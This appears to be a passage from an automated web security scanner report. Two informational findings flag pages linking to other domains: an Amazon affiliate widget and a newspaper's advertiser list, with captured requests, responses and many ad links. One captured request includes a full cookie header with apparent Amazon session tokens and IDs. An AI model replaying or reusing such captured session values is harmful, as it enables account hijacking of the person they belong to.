<span jscontent="MSG_SEND_MESSAGE">
...[SNIP]...
<a class="fc-faded-link" href="javascript:void(0);" jsvalues="$h:handle(this,&#39;goToEditProfile&#39;)">
<img class="fc-edit-pic" src="http://www.google.com/friendconnect/scs/images/fc-edit.png">
<span jscontent="MSG_EDIT_PROFILE">
...[SNIP]...
<a class="fc-faded-link" href="javascript:void(0);" jsselect="person" jsvalues="$h:handle(this,&#39;goToBlockMember&#39;)">
<img class="fc-do-not-enter-pic" src="http://www.google.com/friendconnect/scs/images/do-not-enter.gif">
<span jscontent="MSG_BLOCK_USER">
...[SNIP]...
<a class="fc-faded-link-small" href="javascript:void(0);" jsselect="person" jsvalues="$h:handle(this,&#39;unblockUser&#39;)">
<img class="fc-plus-pic" src="http://www.google.com/friendconnect/scs/images/unblock.gif">
<span jscontent="MSG_UNBLOCK_USER">
...[SNIP]...
<td valign="top"><img src="http://www.google.com/friendconnect/scs/images/smallEnvelope.jpg"></td>
...[SNIP]...
13.58. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /e/cm?t=oruf-20&o=1&p=9&l=sb3&pvid=062B51BD8CA550D9&ref-url=http%3A//orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html&ref-title=The%20Orange%20Orb%3A%20Planets%20Align%20on%20Friday%20the%2013th%2C%20AND...&ref-ref=&bgc=FFFFFF&bdc=C80109&pcc=990000&tec=000000&tic=DC1D25&ac=FFFFFF&pvc=6E6E6E&mp=1&hl=1&dsc=1&title=82,101,103,97,110,32,76,101,101,39,115,32,83,116,111,114,101,32,111,110,32,65,109,97,122,111,110,46,99,111,109,33&f=ifr&e=utf-8 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lc-main=en_US; s_pers=%20s_ev15%3D%255B%255B%2527Typed/Bookmarked%2527%252C%25271303907323249%2527%255D%252C%255B%2527Typed/Bookmarked%2527%252C%25271303911653101%2527%255D%252C%255B%2527www.webstoresellmore.com%2527%252C%25271303919819108%2527%255D%255D%7C1461772619108%3B%20s_dl%3D1%7C1303921676354%3B%20gpv_page%3DUS%253AWS%253APricing-Options%253APricing-Options%7C1303921676363%3B; _mkto_trk=id:810-GRW-452&token:_mch-amazon.com-1303907323369-39830; session-token=45h19hdOPPJ6wOOfLpRhuZ5a+tHbJN0Yn1Pz8Mt9SC8iEu30sQidjghp+yiRcg/lJEw2MQjNsYBTvrnFumfZbugF8QO2HHy6dOzlE94Gg05TyeLIRgBJLrI+NTqi0wO2wJ403GqaJfi7BSth5OxeeVFJ5+daAcNcUOZouvxnpaoJRaKE8bf5vC00RyndOSQu2HP0E3/TBVDD9LtynyiLetGL0vfAM8K9mCUTAxjCXQMh0pHaCNNAFi5s78XmwXgR; __utma=194891197.750670333.1304243790.1304243790.1304243790.1; __utmz=194891197.1304243790.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ubid-main=177-8019787-9467434; session-id-time=2082787201l; session-id=175-8214368-0288160; apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:18 GMT
Server: Server
Set-Cookie: apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 3949
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<a href="http://astore.amazon.com/oruf-20/detail/1933665289" target="_top"><img class="productImage" src="http://ecx.images-amazon.com/images/I/51-vJEhsoQL._SX60_SY80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...
13.59. http://shop.mysuburbanlife.com/ROP/portablerop.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisers&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:51 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68519

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009420&amp;advid=1360889" class="t-rop-ad-anchor" target="" id="rop-ad/11009420-300x460">5th Ave Cab<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984155&amp;advid=1495093" class="t-rop-ad-anchor" target="" id="rop-ad/10984155-300x460">A Cut Above Hair Design, LLC<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009528&amp;advid=911858" class="t-rop-ad-anchor" target="" id="rop-ad/11009528-300x460">A Shade Better<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015103&amp;advid=1301901" class="t-rop-ad-anchor" target="" id="rop-ad/11015103-300x460">AAMCO Transmission<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015276&amp;advid=927309" class="t-rop-ad-anchor" target="" id="rop-ad/11015276-300x460">Absolute Healthcare Chiropractic<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984035&amp;advid=939112" class="t-rop-ad-anchor" target="" id="rop-ad/10984035-300x460">Adventist Hinsdale Hospital<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
"http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009442&amp;advid=915018" class="t-rop-ad-anchor" target="" id="rop-ad/11009442-300x460">Adventist La Grange Memorial Hospital<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (2)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984143&amp;advid=1058882" class="t-rop-ad-anchor" target="" id="rop-ad/10984143-300x460">Alberto\'s Restaurant<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984182&amp;advid=944862" class="t-rop-ad-anchor" target="" id="rop-ad/10984182-300x460">Allstate Insurance Company<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984151&amp;advid=1495087" class="t-rop-ad-anchor" target="" id="rop-ad/10984151-300x460">Al\'s Beef<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
f="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009447&amp;advid=1058928" class="t-rop-ad-anchor" target="" id="rop-ad/11009447-300x460">American Youth Soccer Organization<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009406&amp;advid=910493" class="t-rop-ad-anchor" target="" id="rop-ad/11009406-300x460">Angelo\'s Foods<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984138&amp;advid=1014284" class="t-rop-ad-anchor" target="" id="rop-ad/10984138-300x460">AnyTime Fitness<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015116&amp;advid=1494416" class="t-rop-ad-anchor" target="" id="rop-ad/11015116-300x460">Audiologic Services<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015246&amp;advid=927423" class="t-rop-ad-anchor" target="" id="rop-ad/11015246-300x460">B.R. Ryall YMCA<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015287&amp;advid=910980" class="t-rop-ad-anchor" target="" id="rop-ad/11015287-300x460">Baird &amp; Warner Real Estate<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (4)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009437&amp;advid=1440975" class="t-rop-ad-anchor" target="" id="rop-ad/11009437-300x460">Battery Giant<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
/shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009440&amp;advid=1043052" class="t-rop-ad-anchor" target="" id="rop-ad/11009440-300x460">Be Fit Physical Therapy &amp; Pilates, Ltd.<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015305&amp;advid=911104" class="t-rop-ad-anchor" target="" id="rop-ad/11015305-300x460">Beacon Hill<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009434&amp;advid=1223354" class="t-rop-ad-anchor" target="" id="rop-ad/11009434-300x460">Belmont Village Assisted Living<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984048&amp;advid=912011" class="t-rop-ad-anchor" target="" id="rop-ad/10984048-300x460">Bloomingdale Dental Care<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009458&amp;advid=1497687" class="t-rop-ad-anchor" target="" id="rop-ad/11009458-300x460">Bolingbrook Soccer Club<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984039&amp;advid=1118941" class="t-rop-ad-anchor" target="" id="rop-ad/10984039-300x460">Bradford &amp; Kent Custom Builders<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009395&amp;advid=1043057" class="t-rop-ad-anchor" target="" id="rop-ad/11009395-300x460">Brookpark Dental Care<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015219&amp;advid=1374884" class="t-rop-ad-anchor" target="" id="rop-ad/11015219-300x460">Butterfield Park District<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (2)</a>
...[SNIP]...
tp://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015211&amp;advid=1293326" class="t-rop-ad-anchor" target="" id="rop-ad/11015211-300x460">Carol Stream Park District / Just Play!<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015250&amp;advid=916243" class="t-rop-ad-anchor" target="" id="rop-ad/11015250-300x460">Central DuPage Hospital<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (2)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015240&amp;advid=910932" class="t-rop-ad-anchor" target="" id="rop-ad/11015240-300x460">Century 21 Lullo<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (2)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009425&amp;advid=910588" class="t-rop-ad-anchor" target="" id="rop-ad/11009425-300x460">Ceramic Art Cafe<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009507&amp;advid=910643" class="t-rop-ad-anchor" target="" id="rop-ad/11009507-300x460">Charter One<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015151&amp;advid=1301900" class="t-rop-ad-anchor" target="" id="rop-ad/11015151-300x460">Chianti\'s<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
"http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009529&amp;advid=1074659" class="t-rop-ad-anchor" target="" id="rop-ad/11009529-300x460">Chicagoland Great American Mutt Show<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
p.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015254&amp;advid=1105046" class="t-rop-ad-anchor" target="" id="rop-ad/11015254-300x460">Children\'s Memorial at Central DuPage Hospital<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
e.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984212&amp;advid=1286004" class="t-rop-ad-anchor" target="" id="rop-ad/10984212-300x460">Christ United Methodist Church of Elmhurst / Annual Plant Sale<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984097&amp;advid=912000" class="t-rop-ad-anchor" target="" id="rop-ad/10984097-300x460">Christopher F. Choyke, DDS, PC<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984190&amp;advid=1075506" class="t-rop-ad-anchor" target="" id="rop-ad/10984190-300x460">Clarendon Hills Bank<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984075&amp;advid=1354569" class="t-rop-ad-anchor" target="" id="rop-ad/10984075-300x460">Clothes Mentor<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009485&amp;advid=910917" class="t-rop-ad-anchor" target="" id="rop-ad/11009485-300x460">Coldwell Banker Honig-Bell<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (2)</a>
...[SNIP]...
"http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015292&amp;advid=881734" class="t-rop-ad-anchor" target="" id="rop-ad/11015292-300x460">Coldwell Banker Residential Brokerage<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (9)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015213&amp;advid=1305823" class="t-rop-ad-anchor" target="" id="rop-ad/11015213-300x460">Comcast<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (3)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009504&amp;advid=1484279" class="t-rop-ad-anchor" target="" id="rop-ad/11009504-300x460">Commonwealth Edison Company<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984092&amp;advid=912062" class="t-rop-ad-anchor" target="" id="rop-ad/10984092-300x460">Cottage Hill Diamonds<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009418&amp;advid=913849" class="t-rop-ad-anchor" target="" id="rop-ad/11009418-300x460">Craig\'s Shoes<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009421&amp;advid=1030381" class="t-rop-ad-anchor" target="" id="rop-ad/11009421-300x460">Crossings at Geneva<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009496&amp;advid=1246736" class="t-rop-ad-anchor" target="" id="rop-ad/11009496-300x460">Currie Motors Chevrolet<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009526&amp;advid=1365634" class="t-rop-ad-anchor" target="" id="rop-ad/11009526-300x460">Customwood Kitchens &amp; Baths<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009414&amp;advid=910507" class="t-rop-ad-anchor" target="" id="rop-ad/11009414-300x460">Dairy Queen<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009388&amp;advid=927390" class="t-rop-ad-anchor" target="" id="rop-ad/11009388-300x460">Delnor Glen Senior Living<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984087&amp;advid=974706" class="t-rop-ad-anchor" target="" id="rop-ad/10984087-300x460">DeVry University<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015208&amp;advid=1262034" class="t-rop-ad-anchor" target="" id="rop-ad/11015208-300x460">DG Hardware<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015149&amp;advid=1498362" class="t-rop-ad-anchor" target="" id="rop-ad/11015149-300x460">Diamond Mart<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009524&amp;advid=912095" class="t-rop-ad-anchor" target="" id="rop-ad/11009524-300x460">Downers Grove Reporter<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009445&amp;advid=882489" class="t-rop-ad-anchor" target="" id="rop-ad/11009445-300x460">Downers Grove Sanitary District<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009412&amp;advid=910499" class="t-rop-ad-anchor" target="" id="rop-ad/11009412-300x460">Dr. Barbara Webster, DDS<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11015141&amp;advid=1489492" class="t-rop-ad-anchor" target="" id="rop-ad/11015141-300x460">Dr. Frank Hanna, DC<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009517&amp;advid=1457892" class="t-rop-ad-anchor" target="" id="rop-ad/11009517-300x460">Dr. Ron Losiewicz<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984100&amp;advid=928198" class="t-rop-ad-anchor" target="" id="rop-ad/10984100-300x460">Elmhurst City Centre<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984050&amp;advid=1267188" class="t-rop-ad-anchor" target="" id="rop-ad/10984050-300x460">Elmhurst Dental<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"> (2)</a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984232&amp;advid=912032" class="t-rop-ad-anchor" target="" id="rop-ad/10984232-300x460">Elmhurst Dermatology<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984208&amp;advid=1490397" class="t-rop-ad-anchor" target="" id="rop-ad/10984208-300x460">Elmhurst Kiwanis Club<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984029&amp;advid=1481429" class="t-rop-ad-anchor" target="" id="rop-ad/10984029-300x460">Elmhurst Memorial Golf Classic<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=10984090&amp;advid=881745" class="t-rop-ad-anchor" target="" id="rop-ad/10984090-300x460">Elmhurst Memorial Healthcare<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009536&amp;advid=1021653" class="t-rop-ad-anchor" target="" id="rop-ad/11009536-300x460">ERA Real Estate<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST&amp;adid=11009499&amp;advid=932088" class="t-rop-ad-anchor" target="" id="rop-ad/11009499-300x460">Ettleson Cadillac / Buick / GMC<img src="http://cdn.travidia.com/t/blank" id="t-hover-image" onmousemove="tv_move(event)" onmouseout="tv_hide(event)"></a>
...[SNIP]...
